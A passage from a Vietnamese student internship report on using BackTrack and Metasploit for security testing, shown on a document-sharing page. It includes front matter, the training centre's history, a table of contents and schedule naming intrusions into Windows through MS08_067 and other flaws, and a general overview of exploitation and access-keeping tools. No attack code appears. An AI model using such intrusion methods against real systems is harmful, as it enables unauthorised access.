Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...
Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...Thư viện Tài liệu mẫu
 
Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...
Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...
Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...Hỗ Trợ Viết Đề Tài luanvanpanda.com
 

Similar to Bao cao thuc tap athena (20)

Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...
Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...
Luận Văn Kiểm Soát Rủi Ro Tuân Thủ Thuế Nghiên Cứu Trường Hợp Cục Thuế Tỉnh Đ...
 
Luận Văn Tổ Chức Công Tác Kế Toán Tại Công Ty Năng Lượng Trường Thịnh
Luận Văn Tổ Chức Công Tác Kế Toán Tại Công Ty Năng Lượng Trường ThịnhLuận Văn Tổ Chức Công Tác Kế Toán Tại Công Ty Năng Lượng Trường Thịnh
Luận Văn Tổ Chức Công Tác Kế Toán Tại Công Ty Năng Lượng Trường Thịnh
 
Đánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy may
Đánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy mayĐánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy may
Đánh giá công tác đãi ngộ nhân sự từ góc độ người lao động tại nhà máy may
 
Nguyen thi thu huong lop tc11.b1
Nguyen thi thu huong lop tc11.b1Nguyen thi thu huong lop tc11.b1
Nguyen thi thu huong lop tc11.b1
 
Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...
Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...
Quản trị đào tạo nhân viên chăm sóc khách hàng tại công ty viettel_Nhan lam l...
 
QUẢN TRỊ ĐÀO TẠO TẠI VIETTEL
QUẢN TRỊ ĐÀO TẠO TẠI VIETTELQUẢN TRỊ ĐÀO TẠO TẠI VIETTEL
QUẢN TRỊ ĐÀO TẠO TẠI VIETTEL
 
Quản trị đào tạo tại viettel
Quản trị đào tạo tại viettelQuản trị đào tạo tại viettel
Quản trị đào tạo tại viettel
 
Luận Văn Tổ Chức Kế Toán Tại Bệnh Viện Lão Khoa Trung Ương
Luận Văn Tổ Chức Kế Toán Tại Bệnh Viện Lão Khoa Trung ƯơngLuận Văn Tổ Chức Kế Toán Tại Bệnh Viện Lão Khoa Trung Ương
Luận Văn Tổ Chức Kế Toán Tại Bệnh Viện Lão Khoa Trung Ương
 
BÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲBÁO CÁO THỰC TẬP - CUỐI KỲ
BÁO CÁO THỰC TẬP - CUỐI KỲ
 
Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...
Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...
Hệ thống thông tin kế toán tiền lương tại công ty TAFCO Hà Nội, 9đ - Gửi miễn...
 
CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...
CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...
CẢI THIỆN CÔNG TÁC TUYỂN DỤNG LAO ĐỘNG TẠI CÔNG TY CỔ PHẦN TECHNO VIỆT NAM CO...
 
Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...
Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...
Một số giải pháp nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty TN...
 
Đề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia Phát
Đề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia PhátĐề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia Phát
Đề tài: Nâng cao hiệu quả công tác tuyển dụng nhân sự tại công ty Hoàng Gia Phát
 
Đề tài Khóa luận 2024 Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...
Đề tài Khóa luận 2024  Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...Đề tài Khóa luận 2024  Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...
Đề tài Khóa luận 2024 Thực trạng quy trình kiểm toán khoản mục Doanh thu bán...
 
PTTKHT_UML_Tham khảo.doc
PTTKHT_UML_Tham khảo.docPTTKHT_UML_Tham khảo.doc
PTTKHT_UML_Tham khảo.doc
 
Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...
Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...
Đề tài luận văn 2024 Tạo động lực cho người lao động tại Công ty Cổ phần môi ...
 
Đề tài thực tập: quản trị nguồn nhân lực tại Công ty Bảo vệ, HAY!
Đề tài thực tập: quản trị nguồn nhân lực tại Công ty Bảo vệ, HAY!Đề tài thực tập: quản trị nguồn nhân lực tại Công ty Bảo vệ, HAY!
Đề tài thực tập: quản trị nguồn nhân lực tại Công ty Bảo vệ, HAY!
 
Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...
Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...
Xây dựng chiến lược cho công ty trách nhiệm hữu hạn lan phố sdt/ ZALO 09345 4...
 
Luận văn: Xây dựng chiến lược cho công ty TNHH Lan Phố, HAY
Luận văn: Xây dựng chiến lược cho công ty TNHH Lan Phố, HAYLuận văn: Xây dựng chiến lược cho công ty TNHH Lan Phố, HAY
Luận văn: Xây dựng chiến lược cho công ty TNHH Lan Phố, HAY
 
Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...
Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...
Luận Văn Các Nhân Tố Tác Động Đến Sự Hài Lòng Của Người Kế Toán Trong Việc Sử...
 

Bao cao thuc tap athena

  • 1. i TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA ---------- BÁO CÁO THỰC TẬP TỐT NGHIỆP ĐỀ TÀI: NGHIÊN CỨU VÀ HƯỚNG DẪN SỬ DỤNG CÁC CHỨC NĂNG CỦA BACKTRACK ĐỂ KIỂM TRA AN NINH MẠNG. Giảng viên hướng dẫn: VÕ ĐỖ THẮNG. Sinh viên thực hiện ĐÀO CÔNG TRUNG. TP. Hồ Chí Minh, 2014.
  • 2. ii LỜI CẢM ƠN. Em xin cám ơn Quý Thầy Cô khoa Cao đẳng thực hành, trường Đại học Công nghệ TP.HCM – HUTECH đã tạo điều kiện cho em được tham gia thực tập thực tế tại các công ty. Em xin cám ơn Quý Thầy Cô đã nhiệt tình giảng dạy giúp em có một lượng kiến thức đầy đủ để có thể hoàn thành báo cáo thực tập này. Em xin cám ơn thầy Võ Đỗ Thắng – Giám đốc Trung tâm đào tạo quản trị mạng và an ninh mạng Athena đã hết lòng hướng dẫn em trong quá trình thực tập. Em xin cám ơn Thầy Nguyễn Ngọc Đại đã đồng ý hướng dẫn giúp em hoàn thành báo cáo thực tập. Cám ơn tất cả các bạn bè thuộc tập thể lớp C12QM15 đã cùng nhau tham gia học tập trong suốt 2 năm qua. Sinh viên thực hiện ĐÀO CÔNG TRUNG
  • 3. iii CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM Độc lập – Tự do – Hạnh phúc NHẬN XÉT THỰC TẬP Họ và tên sinh viên : ĐÀO CÔNG TRUNG. Mã sinh viên : 12203214. Khoá học : 2012-2014. 1. Thời gian thực tập : …………………………………………………………………………………… …………………………………………………………………………………… …………………………………………………………………………………… 2. Bộ phận thực tập : …………………………………………………………………………………… …………………………………………………………………………………… 3. Tinh thần trách nhiệm với công việc và ý thức chấp hành kỷ luật : …………………………………………………………………………………… …………………………………………………………………………………… …………………………………………………………………………………… …………………………………………………………………………………… 4. Kết quả thực tập theo đề tài : …………………………………………………………………………………… …………………………………………………………………………………… …………………………………………………………………………………… 5. Nhận xét chung : …………………………………………………………………………………… …………………………………………………………………………………… …………………………………………………………………………………… Cán bộ hướng dẫn của cơ quan đến thực tập (Ký và ghi rõ họ tên) Ngày ....... tháng ........ năm ......... Thủ trưởng cơ quan (Ký tên và đóng dấu)
  • 4. iv NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN : .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. .................................................................................................................................. Ngày ....... tháng ........ năm ......... GIÁO VIÊN HƯỚNG DẪN (Ký và ghi rõ họ tên)
  • 5. v MỤC LỤC LỜI CÁM ƠN. .............................................................................................................. ii NHẬN XÉT THỰC TẬP ............................................................................................ iii NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN ....................................................... iv LỜI MỞ ĐẦU ............................................................................................................. vii CHƯƠNG 1: GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VÀ DỰ ÁN MẠNG. . 1 1.1 GIỚI THIỆU VỀ CÔNG TY. ........................................................................ 1 1.2 LỊCH SỬ HÌNH THÀNH. ............................................................................. 1 1.3 QUÁ TRÌNH PHÁT TRIỂN. ........................................................................ 2 1.4 CHỨC NĂNG VÀ NHIỆM VỤ . .................................................................. 3 1.5 CƠ CẤU TỔ CHỨC ..................................................................................... . 3 1.6 LĨNH VỰC HOẠT ĐỘNG KINH DOANH. ................................................ 3 1.7 THÔNG TIN VỀ DỰ ÁN SINH VIÊN THAM GIA THỰC TẬP. .............. 4 CHƯƠNG 2 : THỰC TRẠNG QUÁ TRÌNH THỰC HIỆN DỰ ÁN MẠNG ....... . 5 2.1. TIẾN ĐỘ THỰC HIỆN DỰ ÁN. .................................................................. 5 2.2. QUÁ TRÌNH THI CÔNG CÁC HẠNG MỤC CỦA DỰ ÁN. ..................... 5 2.2.1. TỔNG QUAN VỀ BACKTRACK. ........................................................... 5 2.2.1.1. GIỚI THIỆU BACKTRACK. ............................................................. 5 2.2.1.2. LỊCH SỬ PHÁT TRIỂN. .................................................................... 6 2.2.1.3. MỤC ĐÍCH. ........................................................................................ 6 2.2.2. FOOTPRINTING ....................................................................................... 7 2.2.3. CÁC KIỂU FOOTPRINTING. .................................................................. 8 2.2.3.1. PASSIVE FOOTPRINTING. ............................................................... 8 2.2.3.2. ACTIVE FOOTPRING. .................................................................... 13 2.2.4. SCANING ................................................................................................ 13 2.2.4.1. CÁC CÔNG CỤ TIỆN ÍCH. ............................................................. 14 2.2.4.2. QUÁ TRÌNH THỰC HIỆN SCANING. ........................................... 14 2.2.5. QUÁ TRÌNH XÂM NHẬP HỆ THỐNG QUA CÁC LỖ HỔNG. ......... 20 2.2.5.1. LỖI MS08_067. ................................................................................. 20 2.2.5.2. LỖI MS10_090. ................................................................................. 26 2.2.5.3. LỖI MS12_004. ................................................................................. 34 2.2.5.4. LỖI MS12_027. 43
  • 6. vi 2.2.5.5. MỞ PORT TREN MODEM,TẤN CONG NGOAI MẠNG INTERNET. ....................................................................................................... 52 2.2.5.6. CÀI ĐẶT METASPLOIT TREN VPS. SỬ DỤNG GIAO DIỆN WEB CỦA METASPLOIT KHAI THÁC MÃ LỖI MS10_090 TỪ VPS. ...... 59 2.2.5.7. XÂM NHẬP WINDOWS 8 TỪ VPS. .............................................. 65 CHƯƠNG 3 : NHẬN XÉT- ĐÁNH GIÁ. ................................................................. 69 3.1. ƯU ĐIỂM. ................................................................................................... 69 3.2. KHUYẾT ĐIỂM. ......................................................................................... 69 3.3. KẾT LUẬN. ................................................................................................ 69
  • 7. vii LỜI MỞ ĐẦU Trong thời đại ngày nay, vai trò của Công nghệ Thông tin (CNTT) và Internet ngày càng vô cùng quan trọng. Điều này kéo theo phần lớn các ngành kinh tế phụ thuộc vào máy vi tính. Chính vì vậy, nhiều ý đồ phá hoại đã nhắm vào hệ thống này, và cũng không loại trừ khả năng đối thủ cạnh tranh nhau, do đó để bảo đảm máy tính hoạt động trơn tru, liên tục đòi hỏi hệ thống phải trang bị những công cụ, những biện pháp phòng thủ, những hệ thống cảnh báo, bảo mật cao nhằm chống lại những tin tặc (hacker). Chúng ta biết rằng hacker có 2 loại, hacker mũ đen và hacker mũ trắng. Hacker mũ đen là những tay tinh quái và thông minh vô cùng, họ không chỉ giỏi về khả năng lập trình mà còn giỏi về cả mạng, giao thức mạng, họ có thể lợi dụng những lỗi nhỏ nhất từ đó khai thác và tấn công hệ thống máy chủ, gây thiệt hại lớn nếu đó là 1 doanh nghiệp lớn, 1 tập đoàn lớn, hay ngân hàng… Thật nguy hiểm nếu như toàn bộ thông tin tài khoản ngân hàng của khách hàng loạt vào tay hacker, cũng như những dự án, kế hoạch của tập đoàn hay của doanh nghiệp. Quả thật thiệt hại do hacker gây ra quá lớn ảnh hưởng nghiêm trọng đến người dùng máy tính. Vì vậy nhằm chống lại những hacker mũ đen, những hacker mũ trắng không ngừng nâng cao kiến thức cũng như sự nhạy bén, cẩn thận, tư duy sáng tạo không ngừng nhằm ngăn chặn, bảo vệ người dùng máy tính, tạo nơi người dùng sự tin cậy cũng như những thông tin, tài khoản, kế hoạch, dự án của họ sẽ hoàn toàn được bảo mật an toàn tuyệt đối. Do đó vai trò an ninh mạng thật sự thiết thực cũng giống như 1 đất nước nếu không có lực lượng công an, cảnh sát, quân đội thì hậu quả mà người dân phải gánh chịu thật nghiêm trọng, và chắc chắn đất nước đó sẽ không bao giờ phát triển kịp theo thời đại kỹ thuật số hiện nay. Nội dung báo cáo gồm 3 chương chính. Chương 1: Giới thiệu chung đơn vị thực tập và dự án mạng. Chương 2: Thực trạng quá trình thực hiện dự án mạng Chương 3: Nhận xét, đánh giá thực trạng.
  • 8. 1 CHƯƠNG 1: GIỚI THIỆU CHUNG ĐƠN VỊ THỰC TẬP VÀ DỰ ÁN MẠNG. 1.1 GIỚI THIỆU VỀ CÔNG TY. Trung Tâm Đào Tạo Mạng và Quản Trị Mạng Quốc Tế ATHENA tiền thân là Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số 4104006757 của Sở Kế Hoạch Và Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008. Tên công ty viết bằng tiếng nước ngoài: ATHENA ADVICE TRAINING NETWORK SECURITY COMPANY LIMITED. 1.2 LỊCH SỬ HÌNH THÀNH. Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn và về tương lai của ngành công nghệ thông tin, họ đã quy tụ được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát triển tiếp theo là vươn tầm đào tạo đội ngũ cán bộ công nghệ thông tin cho đất nước và xã hội. Các thành viên sáng lập bao gồm: Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu Athena, hiện tại là giám đốc dự án công ty Siemen Telecom. Ông Hứa Văn Thế Phúc: Phó Giám Đốc Phát triển Thương Mại Công ty EIS, Phó Tổng Công ty FPT. Ông Nghiêm Sỹ Thắng: Phó Tổng Giám Đốc Ngân hàng Liên Việt, chịu trách nhiệm công nghệ thông tin của ngân hàng. Ông Võ Đỗ Thắng: hiện là Giám Đốc Trung tâm đào tạo quản trị và an ninh mạng Athena. Đến năm 2003, bốn thành viên sáng lập cùng với đội ngũ ứng cứu máy tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu máy tính miền Nam. Công ty TNHH Tư vấn và Đào tạo quản trị mạng Việt Năng, hay còn gọi là Trung tâm đào tạo Quản trị và An ninh mạng Quốc Tế Athena (tên thương hiệu viết tắt là TRUNG TÂM ĐÀO TẠO ATHENA), được chính thức thành lập theo giấy phép kinh doanh số
  • 9. 2 4104006757 của Sở Kế Hoạch Và Đầu Tư Tp Hồ Chí Minh cấp ngày 04 tháng 11 năm 2008 . 1.3 QUÁ TRÌNH PHÁT TRIỂN. Từ năm 2004 - 2006: Trung tâm có nhiều bước phát triển và chuyển mình. Trung tâm trở thành một trong những địa chỉ đáng tin cậy của nhiều doanh nghiệp nhằm cài đặt hệ thống an ninh và đào tạo cho đội ngũ nhân viên các doanh nghiệp về các chương trình quản lý dự án MS Project 2003, kỹ năng thương mại điện tử và bảo mật webvà là địa chỉ đáng tin cậy của nhiều học sinh, sinh viên đến đăng ký học. Đòi hỏi cấp thiết trong thời gian này của trung tâm là nâng cao hơn nữa đội ngũ giảng viên cũng như cơ sở để đáp ứng nhu cầu ngày càng cao về công nghệ thông tin của đất nước nói chung, doanh nghiệp, cá nhân nói riêng. Đến năm 2006: Trung tâm đào tạo và quản trị mạng Athena mở ra một chi nhánh tại cư xá Nguyễn Văn Trỗi. Đồng thời tiếp tục tuyển dụng đội ngũ giảng viên là những chuyên gia an ninh mạng tốt nghiệp các trường đại học và học viện công nghệ thông tin uy tín trên toàn quốc, đồng thời trong thơi gian này Athena có nhiều chính sách ưu đãi nhằm thu hút đội ngũ nhân lực công nghệ thông tin lành nghề từ các tổ chức, doanh nghiệp nhằm làm giàu thêm đội ngũ của trung tâm. Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng mọc lên cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung tâm gặp nhiều khó khăn. Ông Nguyễn Thế Đông cùng ông Hứa Văn Thế Phúc rút vôn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống của trung tâm cộng thêm hoạt động tại chi nhánh Nguyễn Văn Trỗi không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này đến khó khăn khác. Lúc này với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng góp phần vào tiến trình tin học hóa đất nước. Ông Võ Đỗ Thắng mua lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm, mở ra một làn gió mới và giai đoạn mới, cùng với quyết tâm mạnh mẽ và tinh thần thép đã giúp ông vượt qua nhiều khó khăn ban đầu, giúp trung tâm đứng vững trong thời kỳ khủng hoảng. Từ năm 2009 - nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược, trung tâm dần được phục hồi và trở lại quỹ đạo hoạt động của mình. Đến nay, trung tâm đã trở thành một trong những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự liên kết rất nhiều công ty và doanh nghiệp, trung tâm trở thành nơi đào tạo và cung cấp nguồn
  • 10. 3 nhân lực công nghệ thông tin cho xã hội. Từng bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà. 1.4 CHỨC NĂNG VÀ NHIỆM VỤ . Trung tâm ATHENA là nơi đào tạo, phát triển nguồn nhân lực công nghệ thông tin nước nhà, là nơi mà bất cứ ai yêu thích và đam công nghệ thông tin phát triển kỹ năng nghề nghiệp tương lai, đồng thời ATHENA cũng là nơi bồi dưỡng những kỹ năng cũng như trao đổi kinh nghiệm thực tế qua những những chương trình đào tạo ngắn hạn miễn phí với mọi người, ngoài ra ATHENA còn có những khóa học dài hạn nhằm bổ sung, củng cố kiến thức cho sinh viên, học sinh hay cho người đã đi làm muốn nâng cao thêm tay nghề của mình. 1.5 CƠ CẤU TỔ CHỨC. 1.6 LĨNH VỰC HOẠT ĐỘNG KINH DOANH. Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính.
  • 11. 4 Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng, Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh.... Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự...... 1.7 THÔNG TIN VỀ DỰ ÁN SINH VIÊN THAM GIA THỰC TẬP. - Nghiên cứu và hướng dẫn sử dụng các chức năng backtrack để kiểm tra an ninh mạng :  Tìm hiểu các công cụ thu thập thông tin.  Tìm hiểu các công cụ Target Discovery.  Tìm hiểu các công cụ scan lỗi.  Tìm hiểu các công cụ Enumeration.  Tìm hiểu các công cụ exploit.  Tìm hiểu các công cụ Privilege Escalation.  Tìm hiểu các công cụ Maintaining Access. - Các bước cần chuẩn bị :  Hệ điều hành BackTrack, windows XP,windows 7,windows 8.  Phần mềm VMware.  VPS.  Hệ thống mạng Internet.
  • 12. CHƯƠNG 2 : THỰC TRẠNG QUÁ TRÌNH THỰC HIỆN DỰ ÁN MẠNG. 2.1. TIẾN ĐỘ THỰC HIỆN DỰ ÁN. - Ngày 07/10 : Nhận đề tài thực tập. Xác định các bước thực hiện. Quay clip giới thiệu. - Ngày 09/10 : Tìm hiểu và cài đặt BackTrack. - Ngày 11/10 : Tìm hiểu các sản phẩm của Athena. Tìm hiểu cách thức phát hiện lỗi bằng Backtrack. - Ngày 14/10 : Tìm hiểu scan hệ thống. - Ngày 16/10 : Cài đặt Nessus, quét thông tin máy XP. Tìm hiểu nmap-scripts. - Ngày 18/10 : Tìm hiểu lỗ hổng ms08_067. - Ngày 21/10 : Tìm hiểu lỗ hổng ms10_090. - Ngày 24/10 : Tìm hiểu lỗ hổng ms12_004. - Ngày 26/10 : Tìm hiểu lỗ hổng ms12_027. - Ngày 28/10 : Tìm hiểu lỗ hổng ms12_020. - Ngày 30/10 : Tìm hiểu về công cụ Metasploit trong BackTrack. - Ngày 03/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms08_067 bằng Metasploit.( https://www.youtube.com/watch?v=m3M33vEqg4s) - Ngày 05/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms10_090 bằng Metasploit.( https://www.youtube.com/watch?v=fUygw4tjDOI) - Ngày 08/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms12_004 bằng Metasploit.( https://www.youtube.com/watch?v=hPmPqKC2zaM) - Ngày 11/11 : Thực hiện xâm nhập hệ điều hành XP qua lỗ hổng ms12_027 bằng Metasploit.( https://www.youtube.com/watch?v=BDVLpPF_NOg) - Ngày 25/11 : Tìm hiểu về VPS, Honeypot. - Ngày 29/11 : Cài đặt Metasploit trên VPS. Xâm nhập windows 8 từ VPS. (Cài đặt : https://www.youtube.com/watch?v=pkEn79kQ4CI) (Xâm nhập windows 8 : https://www.youtube.com/watch?v=0DtgzfdPl8A) 2.2. QUÁ TRÌNH THI CÔNG CÁC HẠNG MỤC CỦA DỰ ÁN. 2.2.1. Tổng quan về BackTrack. 2.2.1.1. Giới thiệu Backtrack. Backtrack là một hệ điều hành phát triển trên nhân Linux đồng thời cũng là bộ sưu tập các công cụ kiểm tra đánh giá mức độ an ninh của hệ thống mạng một cách toàn diện. Backtrack trở thành một công cụ không thể thiếu với những ai muốn tìm hiểu nghiên cứu, và khám phá thế giới bảo mật.
  • 13. 6 Nguồn tải: http://www.backtrack-linux.org/downloads/ 2.2.1.2. Lịch sử phát triển. Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, bạn sử dụng có thể Backtrack trực tiếp từ đĩa DVD mà không cần cài nó vào máy của bạn. Backtrack cũng có thể được cài đặt vào ổ cứng và sử dụng như một hệ điều hành. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm -IWHAX, WHOPPIX, và Auditor. Trong phiên bản hiện tại của nó (4.0), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 8,10. Tính đến ngày 19 tháng bảy năm 2010, Backtrack 4 đã được tải về của hơn 1,5 triệu người sử dụng. Backtrack dành cho tất cả mọi người từ các chuyên gia trong lĩnh vực bảo mật tới những người mới bước vào lĩnh vực an toàn thông tin và bạn có thể dễ dàng tìm và cập nhật cơ sở dữ liệu một cách nhanh nhất về bộ sưu tập các công cụ bảo mật. Cộng đồng phát triển lên Backtrack bao gồm từ những người có kiến thức sâu và kinh nghiệm trong lĩnh vực an toàn thông tin, tới từ các cơ quan chính phủ, trong lĩnh vực công nghệ thông tin, hoặc những người đam mê về bảo mật, đến các cá nhân mới gia nhập vào cộng đồng bảo mật. Hiện nay Backtrack đã phát triển đến phiên bản mới nhất là Backtrack6 (hay còn gọi là Kali Linux). 2.2.1.3. Mục đích. Backtrack chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của bạn. Các công cụ kiểm tra thâm nhập trong Backtrack có thể được phân loại như sau: - Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail. Thông tin này được thu thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu. - Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning. - Vulnerability identification: Trong thể loại này, bạn có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP).
  • 14. 7 - Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web - Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), bạn có thể sử dụng các công cụ trong thể loại này. - Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. - Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, bạn có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của bạn cho các đặc quyền cao nhất. - Maintaining access: Công cụ trong loại này sẽ có thể giúp bạn trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Bạn có thể cần để có được những đặc quyền cao nhất trước khi các bạn có thể cài đặt công cụ để duy trì quyền truy cập - Voice Over IP (VOIP): Để phân tích VOIP bạn có thể sử dụng các công cụ trong thể loại này . Backtrack cũng có những tool sử dụng cho: - Digital forensics: Trong loại này, bạn có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, bạn có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi bạn phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. - Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. 2.2.2. Footprinting là gì? Footprinting là 1 trong 3 quá trình đầu tiên mà hacker sẽ tiến hành nhằm thu thập thông tin của mục 